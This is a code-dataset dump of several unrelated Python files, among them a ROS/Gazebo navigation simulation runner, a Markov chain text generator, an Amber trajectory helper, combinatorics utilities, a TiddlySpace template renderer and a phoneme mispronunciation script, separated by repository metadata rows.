self.plan_file = rospy.get_param('~plan_file')
self.n_iterations = int(rospy.get_param('~n_iterations'))
self.distance_between_obstacles = \
float(rospy.get_param('~distance_between_obstacles'))
self.robot_radius = float(rospy.get_param('~robot_radius'))
self.obstacle_length = float(rospy.get_param('~obstacle_length'))
self.max_obstacle_shiftment = \
float(rospy.get_param('~max_obstacle_shiftment'))
self.timeout_factor = int(rospy.get_param('~timeout_factor'))
self.max_robot_speed = float(rospy.get_param('~max_robot_speed'))
self.simulation_data_pub = \
rospy.Publisher('/simulation_data', SimulationMsg, queue_size=1)
self.poseArray_publisher = rospy.Publisher('/waypoints', PoseArray, queue_size=1)
self.frame_id = rospy.get_param('~goal_frame_id','map')
# List of 2D points that describe de trajectory of the robot
self.points_2d = []
# Initial robot state
self.initial_state = ModelState()
# Trayectory goals
self.waypoints = []
# Get plan
self.get_plan_from_file()
# Build an obstacles model generator
self.obstacles_model_generator = \
ObstaclesModelGenerator("MySimulation", self.obstacle_length,\
self.robot_radius, self.points_2d[0][0], self.points_2d[0][1],\
self.distance_between_obstacles, self.max_obstacle_shiftment)
i = 0
# Append a segment
for point in self.points_2d:
if(i != 0):
self.obstacles_model_generator.append_point(\
str(i), point[0], point[1])
i += 1
self.n_segments = len(self.waypoints)
# Buil a results listener
self.simulation_results_listener = \
SimulationResults(self.n_segments, self.n_iterations)
# Set some metadata for each segment
for i in range(0, self.n_segments):
if(i != 0):
self.simulation_results_listener.set_segment_metadata(i, \
self.points_2d[i][0], self.points_2d[i][1], \
self.points_2d[i+1][0], self.points_2d[i+1][1], self.distance_between_obstacles, \
self.obstacles_model_generator.segments[i].get_segment_timeout(\
self.max_robot_speed, self.timeout_factor))
else:
self.simulation_results_listener.set_segment_metadata(0, \
self.points_2d[0][0], self.points_2d[0][1], \
self.points_2d[1][0], self.points_2d[1][1], self.distance_between_obstacles, \
self.obstacles_model_generator.segments[0].get_segment_timeout(\
self.max_robot_speed, self.timeout_factor))
i += 1
def reset_gazebo_world(self):
# reset the gazebo world to the initial state
rospy.wait_for_service('/gazebo/reset_world')
reset_world = rospy.ServiceProxy('/gazebo/reset_world', Empty)
try:
res = reset_world()
except rospy.ServiceException as exc:
rospy.loginfo("Service did not process request: " + str(exc))
def set_vehicle_model_state(self):
# Se the initial robot model state
rospy.wait_for_service('gazebo/set_model_state')
set_model_state = rospy.ServiceProxy('gazebo/set_model_state', SetModelState)
try:
set_model_state(self.initial_state)
except rospy.ServiceException as exc:
rospy.loginfo("Service did not process request: " + str(exc))
def get_plan_from_file(self):
"""
Function with allows us to get a path pre-configured from file and
load it to be used in the simulation.
"""
self.waypoints = []
self.points_2d = []
# Read the ros bag file from ~/.ros/
bag = rosbag.Bag(self.plan_file)
# Get the robot initial state
for topic, msg, t in bag.read_messages(topics=['initial_model_state']):
self.initial_state = msg
self.points_2d.append((round(float(msg.pose.position.x),2),\
round(float(msg.pose.position.y),2)))
# Get the trayectory goals
for topic, msg, t in bag.read_messages(topics=['path_goals_bag']):
self.waypoints.append(msg)
self.points_2d.append((round(float(msg.pose.pose.position.x), 2),\
round(float(msg.pose.pose.position.y),2)))
bag.close()
def convert_PoseWithCovArray_to_PoseArray(self):
"""Used to publish waypoints as pose array so that you can see them in rviz, etc."""
poses = PoseArray()
poses.header.frame_id = 'map'
poses.poses = [pose.pose.pose for pose in self.waypoints]
return poses
def msg_to_csv(self, msg):
with open(self.csv_path + msg.metadata.simulation_hash + "_" + msg.metadata.date + ".csv", 'wb') as csvfile:
fieldnames_global_segments_results = ['segment_index', 'n_failures', \
'time_mean', 'time_stdev', \
'time_max', 'time_min', \
'distance_mean', 'distance_stdev', \
'distance_max', 'distance_min', \
'speed_mean', 'speed_stdev', \
'speed_max', 'speed_min']
fieldnames_global_simulation_results = ['n_failures', \
'time_mean', 'time_stdev', \
'time_max', 'time_min', \
'distance_mean', 'distance_stdev', \
'distance_max', 'distance_min', \
'speed_mean', 'speed_stdev', \
'speed_max', 'speed_min']
fieldnames_segments_metadata = ['segment_index', 'initial_point', \
'end_point', 'distance_between_obstacles', \
'segment_simulation_timeout']
fieldnames_simulation_metadata = ['simulation_hash', 'robot_file', \
'world_file', 'plan_file', \
'map_file', 'date', \
'n_segments', 'n_iterations', \
'timeout_factor', 'useful_simulation', \
'local_planner', 'global_planner']
# Simulation metadata
writer = csv.DictWriter(csvfile, fieldnames=['Simulation metadata'], delimiter=';', quotechar='"')
writer.writeheader()
writer = csv.DictWriter(csvfile, fieldnames=fieldnames_simulation_metadata, delimiter=';', quotechar='"')
writer.writeheader()
writer.writerow({'simulation_hash':msg.metadata.simulation_hash, 'robot_file':msg.metadata.robot_file, \
'world_file':msg.metadata.world_file, 'plan_file':msg.metadata.plan_file, 'map_file':msg.metadata.map_file, \
'date':msg.metadata.date, 'n_segments':msg.metadata.n_segments, \
'n_iterations':msg.metadata.n_iterations, 'timeout_factor':msg.metadata.timeout_factor, \
'useful_simulation':msg.metadata.useful_simulation, 'useful_simulation':msg.metadata.useful_simulation, \
'local_planner':msg.metadata.local_planner, 'global_planner':msg.metadata.global_planner})
# Segments metadata
writer = csv.DictWriter(csvfile, fieldnames=['Segments metadata'], delimiter=';', quotechar='"')
writer.writeheader()
writer = csv.DictWriter(csvfile, fieldnames=fieldnames_segments_metadata, delimiter=';', quotechar='"')
writer.writeheader()
for i in msg.metadata.segments_metadata.segments_metadata:
writer.writerow({'segment_index':i.segment_index, 'initial_point':i.initial_point, \
'end_point':i.end_point, 'distance_between_obstacles':i.distance_between_obstacles, \
'segment_simulation_timeout':i.segment_simulation_timeout})
# Global Simulation Results
writer = csv.DictWriter(csvfile, fieldnames=['Global simulation results'], delimiter=';', quotechar='"')
writer.writeheader()
writer = csv.DictWriter(csvfile, fieldnames=fieldnames_global_simulation_results, delimiter=';', quotechar='"')
writer.writeheader()
writer.writerow({'n_failures':msg.global_simulation_results.n_failures, \
'time_mean':msg.global_simulation_results.time_mean, 'time_stdev':msg.global_simulation_results.time_stdev, \
'time_max':msg.global_simulation_results.time_max, 'time_min':msg.global_simulation_results.time_min, \
'distance_mean':msg.global_simulation_results.distance_mean, 'distance_stdev':msg.global_simulation_results.distance_stdev, \
'distance_max':msg.global_simulation_results.distance_max, 'distance_min':msg.global_simulation_results.distance_min, \
'speed_mean':msg.global_simulation_results.speed_mean, 'speed_stdev':msg.global_simulation_results.speed_stdev, \
'speed_max':msg.global_simulation_results.speed_max, 'speed_min':msg.global_simulation_results.speed_min})
# Global Segments Results
writer = csv.DictWriter(csvfile, fieldnames=['Global segments results'], delimiter=';', quotechar='"')
writer.writeheader()
writer = csv.DictWriter(csvfile, fieldnames=fieldnames_global_segments_results, delimiter=';', quotechar='"')
writer.writeheader()
for i in msg.global_segments_results:
writer.writerow({'segment_index':i.segment_index, 'n_failures':i.n_failures, \
'time_mean':i.time_mean, 'time_stdev':i.time_stdev, \
'time_max':i.time_max, 'time_min':i.time_min, \
'distance_mean':i.distance_mean, 'distance_stdev':i.distance_stdev, \
'distance_max':i.distance_max, 'distance_min':i.distance_min, \
'speed_mean':i.speed_mean, 'speed_stdev':i.speed_stdev, \
'speed_max':i.speed_max, 'speed_min':i.speed_min})
tkMessageBox.showinfo('Results', "A CSV file has been generated behind the path "+self.csv_path + msg.metadata.simulation_hash + "_" + msg.metadata.date + ".csv")
def start(self):
""" Low level information publisher. High level should be
subscribed to the simulation_data topic.
"""
# Get a move_base action client
client = actionlib.SimpleActionClient('move_base', MoveBaseAction)
client.wait_for_server()
# Start publishing goals
for i in range(0, self.n_iterations):
self.poseArray_publisher.publish(self.convert_PoseWithCovArray_to_PoseArray())
# Initialize the simulation for each iteration
self.reset_gazebo_world()
self.set_vehicle_model_state()
self.obstacles_model_generator.spawn_obstacles()
time.sleep(3)
for j in range(0, self.n_segments):
# Build goal
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = self.frame_id
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position = self.waypoints[j].pose.pose.position
goal.target_pose.pose.orientation = self.waypoints[j].pose.pose.orientation
self.simulation_results_listener.start(j, i)
# send the goal
client.send_goal(goal)
finished_within_time = client.wait_for_result(\
rospy.Duration(self.simulation_results_listener.segments_metadata[j].segment_simulation_timeout))
# Check simulation state
if not finished_within_time:
client.cancel_goal()
self.simulation_results_listener.stop(j, i, True)
break
else:
state = client.get_state()
if state == GoalStatus.SUCCEEDED:
self.simulation_results_listener.stop(j, i, False)
else:
self.simulation_results_listener.stop(j, i, True)
break
time.sleep(3)
msg = self.simulation_results_listener.get_msg(\
self.plan_file, self.timeout_factor)
self.simulation_data_pub.publish(msg)
self.msg_to_csv(msg)
self.db_client.insert_simulation_results(msg)
| 55.723577 | 170 | 0.619273 | 1,537 | 13,708 | 5.251139 | 0.1581 | 0.05687 | 0.048445 | 0.041878 | 0.424731 | 0.322637 | 0.270103 | 0.220047 | 0.187337 | 0.147937 | 0 | 0.005444 | 0.276408 | 13,708 | 245 | 171 | 55.95102 | 0.808247 | 0.070032 | 0 | 0.223881 | 0 | 0 | 0.126747 | 0.015636 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034826 | false | 0 | 0.069652 | 0 | 0.114428 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41c495323f09d70b9547788b90e0defddbe36bbc | 2,371 | py | Python | plugins/intern/markov.py | rbracken/internbot | 58b802e0dd7597ace12acd9342bb938e2f33c25d | [
"BSD-2-Clause"
] | 1 | 2016-09-24T16:00:06.000Z | 2016-09-24T16:00:06.000Z | plugins/intern/markov.py | rbracken/internbot | 58b802e0dd7597ace12acd9342bb938e2f33c25d | [
"BSD-2-Clause"
] | null | null | null | plugins/intern/markov.py | rbracken/internbot | 58b802e0dd7597ace12acd9342bb938e2f33c25d | [
"BSD-2-Clause"
] | null | null | null | import random
""" Credits for this code go to Shabda Raaj, pulled from the article
'Generating pseudo-random text with Markov chains using Python',
which can be found at:
http://agiliq.com/blog/2009/06/generating-pseudo-random-text-with-markov-chains-u/ """
class Markov(object):
def __init__(self, open_file):
self.cache = {}
self.open_file = open_file
self.words = self.file_to_words()
self.word_size = len(self.words)
self.database()
def file_to_words(self):
self.open_file.seek(0)
data = self.open_file.read()
words = data.lower().split()
return words
def triples(self):
""" Generates triples from the given data string. So if our string were
"What a lovely day", we'd generate (What, a, lovely) and then
(a, lovely, day).
"""
if len(self.words) < 3:
return
for i in range(len(self.words) - 2):
yield (self.words[i], self.words[i+1], self.words[i+2])
def database(self):
for w1, w2, w3 in self.triples():
key = (w1, w2)
if key in self.cache:
self.cache[key].append(w3)
else:
self.cache[key] = [w3]
def generate_markov_text(self, size=25):
seed = random.randint(0, self.word_size-3)
seed_word, next_word = self.words[seed], self.words[seed+1]
w1, w2 = seed_word, next_word
gen_words = []
for i in xrange(size):
gen_words.append(w1)
w1, w2 = w2, random.choice(self.cache[(w1, w2)])
gen_words.append(w2)
return ' '.join(gen_words)
def generate_markov_response(self, seed_word=None, next_word=None, size=25):
w1, w2 = seed_word, next_word
gen_words = []
try:
for i in xrange(size):
gen_words.append(w1)
w1, w2 = w2, random.choice(self.cache[(w1, w2)])
gen_words.append(w2)
except:
seed = self.words.index(next_word)
seed_word = self.words[seed-1]
w1, w2 = seed_word, next_word
for i in xrange(size):
gen_words.append(w1)
w1, w2 = w2, random.choice(self.cache[(w1, w2)])
gen_words.append(w2)
return ' '.join(gen_words)
| 32.040541 | 90 | 0.557992 | 325 | 2,371 | 3.944615 | 0.298462 | 0.077223 | 0.065523 | 0.049922 | 0.359594 | 0.359594 | 0.359594 | 0.294072 | 0.265991 | 0.265991 | 0 | 0.033022 | 0.32307 | 2,371 | 73 | 91 | 32.479452 | 0.765732 | 0.061999 | 0 | 0.365385 | 0 | 0 | 0.001042 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0 | 0.019231 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41c53301d55d3133fde81eb12b2a9be32599efe5 | 3,590 | py | Python | isee/infrastructure/mdengine.py | team-mayes/isEE | c22d7cc78a43f0c0a7b2ec18fbc3b628ddef8d54 | [
"BSD-3-Clause"
] | null | null | null | isee/infrastructure/mdengine.py | team-mayes/isEE | c22d7cc78a43f0c0a7b2ec18fbc3b628ddef8d54 | [
"BSD-3-Clause"
] | 1 | 2021-09-17T18:20:36.000Z | 2021-10-06T16:56:34.000Z | isee/infrastructure/mdengine.py | team-mayes/isEE | c22d7cc78a43f0c0a7b2ec18fbc3b628ddef8d54 | [
"BSD-3-Clause"
] | null | null | null | """
Interface for MDEngine objects. New MDEngines can be implemented by constructing a new class that inherits from MDEngine
and implements its abstract methods.
"""
import abc
import os
import pytraj
import mdtraj
class MDEngine(abc.ABC):
"""
Abstract base class for molecular dynamics engines.
Implements methods for all of the engine-specific tasks that isEE might need.
"""
@abc.abstractmethod
def get_frame(self, trajectory, frame, settings):
"""
Return a new file containing just the frame'th frame of a trajectory in Amber .rst7 format
Parameters
----------
trajectory : str
Name of trajectory file to obtain last frame from
frame : int
Index of frame to return; 1-indexed, -1 gives last frame, 0 is invalid
settings : argparse.Namespace
Settings namespace object
Returns
-------
last_frame : str
Name of .rst7 format coordinate file corresponding to desired frame of trajectory, if it exists; an empty
string otherwise
"""
pass
class AdaptAmber(MDEngine):
"""
Adapter class for Amber MDEngine.
"""
def get_frame(self, trajectory, frame, settings):
new_restart_name = trajectory + '_frame_' + str(frame) + '.rst7'
if not os.path.exists(trajectory):
return '' # since it's possible to call this before the trajectory file has been initialized
if frame >= 1:
shift_frame = frame - 1 # because write_traj is 0-indexed but get_frame is 1-indexed
elif frame == -1:
shift_frame = -1
else:
raise IndexError('invalid frame index for get_frame: ' + str(frame) + ' (must be >= 1, or exactly -1)')
# Use mdtraj to check for non-zero trajectory length (pytraj gives an error below if n_frames = 0)
try:
traj = mdtraj.load(trajectory, top=settings.topology)
if traj.n_frames == 0:
del traj
return ''
except ValueError: # sometimes this is the result of trying to load a trajectory too early
return ''
traj = pytraj.iterload(trajectory, settings.topology)
try:
pytraj.write_traj(new_restart_name, traj, format='rst7', frame_indices=[shift_frame], options='multi', overwrite=True, velocity=True)
except ValueError: # pytraj raises a ValueError if frame index is out of range
raise IndexError('frame index ' + str(frame) + ' is out of range for trajectory: ' + trajectory)
except AssertionError: # sometimes there's an assertion error when shift_frame = -1; cause unknown, but this fixes it
if shift_frame == -1:
shift_frame = traj.n_frames - 1
try:
pytraj.write_traj(new_restart_name, traj, format='rst7', frame_indices=[shift_frame], options='multi',
overwrite=True, velocity=True)
except ValueError: # pytraj raises a ValueError if frame index is out of range
raise IndexError('frame index ' + str(frame) + ' is out of range for trajectory: ' + trajectory)
try:
os.rename(new_restart_name + '.1', new_restart_name)
except OSError:
if not os.path.exists(new_restart_name):
raise OSError('expected pytraj to write either ' + new_restart_name + ' or ' + new_restart_name + '.1, '
'but found neither.')
return new_restart_name
| 39.888889 | 145 | 0.618106 | 443 | 3,590 | 4.918736 | 0.34763 | 0.041303 | 0.057825 | 0.022028 | 0.267095 | 0.251492 | 0.251492 | 0.216613 | 0.216613 | 0.216613 | 0 | 0.009204 | 0.3039 | 3,590 | 89 | 146 | 40.337079 | 0.862745 | 0.372145 | 0 | 0.304348 | 0 | 0 | 0.118015 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 1 | 0.043478 | false | 0.021739 | 0.086957 | 0 | 0.26087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41c87d04befa3b08aff049a14265e8461d8d9c45 | 2,181 | py | Python | rubikscubennnsolver/combinatorial.py | dwalton76/rubiks-cube-NxNxN-solver | db42aeacca81366dba87ef475274ffb99645193d | [
"MIT"
] | 59 | 2017-04-29T15:19:29.000Z | 2022-03-18T22:17:20.000Z | rubikscubennnsolver/combinatorial.py | dwalton76/rubiks-cube-NxNxN-solver | db42aeacca81366dba87ef475274ffb99645193d | [
"MIT"
] | 44 | 2017-05-25T00:05:31.000Z | 2022-03-23T22:39:34.000Z | rubikscubennnsolver/combinatorial.py | dwalton76/rubiks-cube-NxNxN-solver | db42aeacca81366dba87ef475274ffb99645193d | [
"MIT"
] | 19 | 2017-06-17T00:32:47.000Z | 2021-12-18T00:03:56.000Z | """
https://en.wikipedia.org/wiki/Combinatorial_number_system
The code below is no longer used but am saving it for a rainy day
"""
# standard libraries
import math
from typing import List
def choose(a: int, b: int) -> int:
"""
>>> choose(23, 8)
490314
>>> choose(9, 6)
84
>>> choose(8, 5)
56
>>> choose(4, 4)
1
>>> choose(3, 4)
0
>>> choose(0, 1)
0
>>> choose(7, -1)
0
"""
if b < 0:
return 0
elif b == a:
return 1
elif b > a:
return 0
return int(math.factorial(a) / (math.factorial(b) * math.factorial(a - b)))
def encode(perm: List[int]) -> int:
"""
>>> encode([11, 10, 9, 8, 3, 2, 1, 0])
425
>>> encode([7, 6, 5, 4, 3, 2, 1, 0])
0
"""
perm_len = len(perm)
k = perm_len
i = 0
total = 0
while i < perm_len:
result = choose(perm[i], k)
total += result
k -= 1
i += 1
return total
def decode(n: int, k: int, start: int) -> List[int]:
"""
>>> decode(0, 8, 24)
[7, 6, 5, 4, 3, 2, 1, 0]
>>> decode(425, 8, 24)
[11, 10, 9, 8, 3, 2, 1, 0]
"""
result = []
for c in reversed(range(start)):
result_choose = choose(c, k)
if result_choose <= n:
n -= result_choose
k -= 1
result.append(c)
return result
def state_to_list(state: str) -> List[int]:
"""
>>> state_to_list('xxLL')
[3, 2]
>>> state_to_list('LLxx')
[1, 0]
>>> state_to_list('LxLx')
[2, 0]
>>> state_to_list('xLxL')
[3, 1]
"""
result = []
for (index, char) in enumerate(state):
if char != "x":
result.append(index)
result = list(reversed(sorted(result)))
return result
def state_to_rank(state: str) -> int:
"""
>>> state_to_rank('xxLL')
5
>>> state_to_rank('LLxx')
0
>>> state_to_rank('LxLx')
1
>>> state_to_rank('xLxL')
4
"""
state_list = state_to_list(state)
result = encode(state_list)
return result
if __name__ == "__main__":
# standard libraries
import doctest
doctest.testmod()
| 15.919708 | 79 | 0.497478 | 307 | 2,181 | 3.403909 | 0.289902 | 0.073684 | 0.063158 | 0.015311 | 0.076555 | 0.03445 | 0.03445 | 0.03445 | 0 | 0 | 0 | 0.069156 | 0.337001 | 2,181 | 136 | 80 | 16.036765 | 0.653527 | 0.339752 | 0 | 0.204545 | 0 | 0 | 0.007353 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113636 | false | 0 | 0.068182 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41c9205a05089b2cfa8d6a14c30a8d7f603ca089 | 835 | py | Python | assignments/a3/constructBinaryTreeFromPreorderAndInorderTraversal.py | jcdiv47/geekbang-algorithms | 38dae85aeadb684b2c44945bd07a32cdede4ad5a | [
"MIT"
] | null | null | null | assignments/a3/constructBinaryTreeFromPreorderAndInorderTraversal.py | jcdiv47/geekbang-algorithms | 38dae85aeadb684b2c44945bd07a32cdede4ad5a | [
"MIT"
] | null | null | null | assignments/a3/constructBinaryTreeFromPreorderAndInorderTraversal.py | jcdiv47/geekbang-algorithms | 38dae85aeadb684b2c44945bd07a32cdede4ad5a | [
"MIT"
] | null | null | null | """
Leetcode(https://leetcode.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/
)"""
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def buildTree(self, preorder, inorder):
if len(preorder) == 0:
return None
root = TreeNode(preorder[0])
root_idx = 0
# find root's index in the inorder array
while root_idx < len(inorder):
if inorder[root_idx] == root.val:
break
root_idx += 1
root.left = self.buildTree(preorder[1: root_idx + 1], inorder[:root_idx])
root.right = self.buildTree(preorder[root_idx + 1:], inorder[root_idx + 1:])
return root
| 29.821429 | 97 | 0.603593 | 108 | 835 | 4.555556 | 0.388889 | 0.113821 | 0.065041 | 0.073171 | 0.089431 | 0.089431 | 0 | 0 | 0 | 0 | 0 | 0.01495 | 0.279042 | 835 | 27 | 98 | 30.925926 | 0.802326 | 0.208383 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41cb04f14dbe73f40c68a5e989b2ab363ee6874c | 3,415 | py | Python | tiddlywebplugins/tiddlyspace/template.py | TiddlySpace/tiddlyspace | 5f2139340d2d9e3a37068b5c58ecb2e599d798b8 | [
"BSD-3-Clause"
] | 32 | 2015-01-04T10:54:29.000Z | 2022-01-22T16:45:24.000Z | tiddlywebplugins/tiddlyspace/template.py | TiddlySpace/tiddlyspace | 5f2139340d2d9e3a37068b5c58ecb2e599d798b8 | [
"BSD-3-Clause"
] | 4 | 2016-12-08T14:04:26.000Z | 2018-02-20T10:23:33.000Z | tiddlywebplugins/tiddlyspace/template.py | TiddlySpace/tiddlyspace | 5f2139340d2d9e3a37068b5c58ecb2e599d798b8 | [
"BSD-3-Clause"
] | 14 | 2015-01-19T23:18:20.000Z | 2021-06-22T01:10:08.000Z | """
Send a template with some default data.
"""
from jinja2 import TemplateNotFound
from tiddlywebplugins.virtualhosting import original_server_host_url
from tiddlyweb import control
from tiddlyweb.model.tiddler import Tiddler
from tiddlyweb.model.recipe import Recipe
from tiddlyweb.store import StoreError
from tiddlywebplugins.templates import get_template
from tiddlyweb.web.util import server_base_url, encode_name
from tiddlywebplugins.tiddlyspace.web import (determine_space,
determine_space_recipe, determine_host)
CUSTOMIZABLES = ['friendlytiddler.html', 'friendlytiddlers.html',
'search.html']
def send_template(environ, template_name, template_data=None):
"""
Set some defaults for a template and send the output.
"""
default_css_tiddler = '/bags/common/tiddlers/profile.css'
if template_data is None:
template_data = {}
html_template_prefix = environ['tiddlyweb.space_settings']['htmltemplate']
if html_template_prefix:
default_css_tiddler = ('/bags/common/tiddlers/%s.css' %
html_template_prefix)
html_template_prefix += '/'
try:
name = html_template_prefix + template_name
template = get_template(environ, name)
except TemplateNotFound:
template = get_template(environ, template_name)
else:
template = get_template(environ, template_name)
store = environ['tiddlyweb.store']
linked_resources = {
'HtmlCss': [],
'HtmlJavascript': []}
if not html_template_prefix or template_name in CUSTOMIZABLES:
linked_resources['HtmlCss'] = [default_css_tiddler]
# Load CSS and JavaScript overrides.
current_space = determine_space(environ, determine_host(environ)[0])
if current_space:
recipe_name = determine_space_recipe(environ, current_space)
try:
recipe = store.get(Recipe(recipe_name))
for title in linked_resources:
try:
tiddler = Tiddler(title)
bag = control.determine_bag_from_recipe(recipe,
tiddler, environ)
tiddler.bag = bag.name
try:
tiddler = store.get(tiddler)
if 'Javascript' in title:
url_content = tiddler.text.strip()
if url_content:
urls = url_content.split('\n')
linked_resources[title] = urls
else:
url = '/bags/%s/tiddlers/%s' % (encode_name(
tiddler.bag), title)
linked_resources[title] = [url]
except StoreError:
continue
except StoreError:
pass
except StoreError:
pass
template_defaults = {
'original_server_host': original_server_host_url(environ),
'css': linked_resources['HtmlCss'],
'js': linked_resources['HtmlJavascript'],
'server_host': server_base_url(environ),
}
template_defaults.update(template_data)
return template.generate(template_defaults)
| 38.370787 | 78 | 0.585652 | 324 | 3,415 | 5.935185 | 0.271605 | 0.054602 | 0.056162 | 0.042122 | 0.075923 | 0.075923 | 0 | 0 | 0 | 0 | 0 | 0.000886 | 0.339092 | 3,415 | 88 | 79 | 38.806818 | 0.85113 | 0.037775 | 0 | 0.185714 | 0 | 0 | 0.086424 | 0.032485 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014286 | false | 0.028571 | 0.128571 | 0 | 0.157143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41cb1605a676dad204255fde9474a9b324ee8353 | 588 | py | Python | test.py | yanzhenxing123/illegal_fund_raising_forecast | dcff8f3d73c1f1ea3548e8d25afc9fe5233e3f64 | [
"Apache-2.0"
] | null | null | null | test.py | yanzhenxing123/illegal_fund_raising_forecast | dcff8f3d73c1f1ea3548e8d25afc9fe5233e3f64 | [
"Apache-2.0"
] | null | null | null | test.py | yanzhenxing123/illegal_fund_raising_forecast | dcff8f3d73c1f1ea3548e8d25afc9fe5233e3f64 | [
"Apache-2.0"
] | null | null | null | """
@Author: yanzx
@Date: 2021-08-10 09:27:55
@Desc:
"""
import time
li = [str(i) + "闫振兴" for i in range(1000000)]
li_s = set(li)
start_time1 = time.time()
if "100000闫振兴" in li:
print(time.time() - start_time1)
start_time2 = time.time()
if "100000闫振兴" in li_s:
print(time.time() - start_time2)
import pandas as pd
import numpy as np
import json
df =pd.read_csv("./testdata.csv")
df = df.iloc[1:20, :]
res = list(json.loads(df.to_json(orient='index')).values())
print(res)
data_array = np.array(df)
# 然后转化为list形式
data_list =data_array.tolist()
# print(data_list)
| 14 | 59 | 0.664966 | 99 | 588 | 3.828283 | 0.525253 | 0.084433 | 0.05277 | 0.100264 | 0.121372 | 0.121372 | 0 | 0 | 0 | 0 | 0 | 0.081466 | 0.164966 | 588 | 41 | 60 | 14.341463 | 0.690428 | 0.134354 | 0 | 0 | 0 | 0 | 0.080483 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
68b72c53435e9aa9b4922a013905036e51730503 | 7,953 | py | Python | mispro/mispro.py | dzubke/speech-lite | 65f83ac2b7551650820f079ce5152741f2a6fdb8 | [
"Apache-2.0"
] | null | null | null | mispro/mispro.py | dzubke/speech-lite | 65f83ac2b7551650820f079ce5152741f2a6fdb8 | [
"Apache-2.0"
] | null | null | null | mispro/mispro.py | dzubke/speech-lite | 65f83ac2b7551650820f079ce5152741f2a6fdb8 | [
"Apache-2.0"
] | null | null | null | # these functions help to detect mispronunciations using editops
#
#
# standard libs
import argparse
# third-party libs
import Levenshtein as lev
# local libs
from speech.utils.data_helpers import path_to_id
from speech.utils.io import read_data_json
def main(hypo_path:str, tgt_path:str, eval_phn_path:str):
"""This function will aim to detect mispronunciations of the `target_phn`
in the predictions in `hypo_path` when compared with the reference in `phn_path`
Args:
hypo_path: path to model predictions
tgt_path: path to phones the speaker should have said
eval_phn_path: path to one-hot encoded labels of evaluation phonemes
Notes:
hypo_path file is formatted as:
ay ih t (None-0)
ao r dh ah t ay m (None-7)
ay l iy v d uw (None-6)
tgt_path file is formatted as:
ay iy t
p r ih t iy sh
dh ah jh ih m
eval_phn_path:
id l r dh p v
00F931A9-6EA9-4233-85B4-94015A257352 1 0 0 0 1 0
012C1AC5-13E0-4337-B6CC-BFD58A12A8BC 1 1 0 0 0 0
054C13A4-9499-453F-90A0-950DA50C4576 1 0 1 0 0 0
"""
hypo_dict = {}
with open(hypo_path, 'r') as hypo_f:
for line in hypo_f:
line = line.strip().split()
phones = line[:-1]
# line last element has format '(None-1)'
hypo_id = int(line[-1].split('-')[1].replace(')', ''))
hypo_dict[hypo_id] = phones
# create mapping from record_id to hypo numerical ordering
tsv_path = tgt_path.replace(".phn", ".tsv")
id_to_order = {}
with open(tsv_path, 'r') as tsv_f:
_ = next(tsv_f)
for i, line in enumerate(tsv_f):
sub_path = line.strip().split('\t', maxsplit=1)[0]
id_to_order[path_to_id(sub_path)] = i
ord_to_eval_phns = read_eval_file(eval_phn_path, id_to_order)
with open(tgt_path, 'r') as phn_f:
for i, line in enumerate(phn_f):
ref_phns = line.strip().split()
hyp_phns = hypo_dict[i]
edit_ops = get_editops(hyp_phns, ref_phns)
try:
rec_id, has_mispro, eval_phns = ord_to_eval_phns[i]
except KeyError as e:
print(f"Key error at index: {i} with line: {line}")
raise e
for eval_phn in eval_phns:
print(f"record id: {rec_id}")
print(f"evaluation phone: {eval_phn}")
